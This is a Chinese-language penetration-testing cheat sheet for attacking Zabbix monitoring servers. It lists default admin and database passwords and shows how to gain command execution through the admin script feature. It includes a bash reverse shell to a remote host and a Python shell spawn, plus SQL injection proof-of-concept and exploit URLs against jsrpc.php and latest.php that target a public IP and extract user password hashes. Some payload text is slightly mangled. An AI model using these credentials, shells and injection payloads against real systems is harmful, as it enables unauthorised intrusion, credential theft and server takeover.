[TOC]
1.Zabbix缺省配置
zabbix缺省账号密码一览:
代码语言:javascript复制admin zabbix #老版本
Admin zabbix #新版本
#zabbix数据库
root zabbix
zabbix zabbix
2.Zabbix命令执行
注意新老版本触发差不多的,此项利用需要登陆后之中在管理菜单栏,然后选择脚本选项卡,添加脚本即可;
WeiyiGeek.创建脚本
设置触发动作来执行我们的脚本:
WeiyiGeek.触发动作
触发后再首页执行:
WeiyiGeek.触发执行
代码语言:javascript复制#触发执行后再tmp可以看见建立的txt文件
[[email protected] tmp]$ cat test.txt
root
#最好就是反弹到vps上来获得交互式shell,比较方便
/bin/bash -i &>/dev/tcp 192.168.1.1 5252 0>&1
#常常采用python的反弹脚本进行反弹:
python -c 'import pty; pty.spawn("/bin/sh")' #设置返回shell的显示格式否则显示bash-4.1$
WeiyiGeek.pythonReverse
注意点:
- 当前zabbix执行的权限问题
- 当前服务器防火墙等等问题(有时监控80端口即可,大部分是放行状态)
3.ZabbixSQL注入
1.jsrpc.php rofileIdx2 存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。
代码语言:javascript复制POC:
http://158.199.140.129/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1
关键字:You have an error in your SQL syntax
EXP:
http://158.199.140.129/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1 or (select 1 from (select count(*),concat((select (select concat(passwd)) from zabbix.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or 1=1)#&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
2.latest.php toggle_ids
代码语言:javascript复制http://158.199.140.129/latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
SQLMAP:
--dbms=mysql --sql-query "select * from users"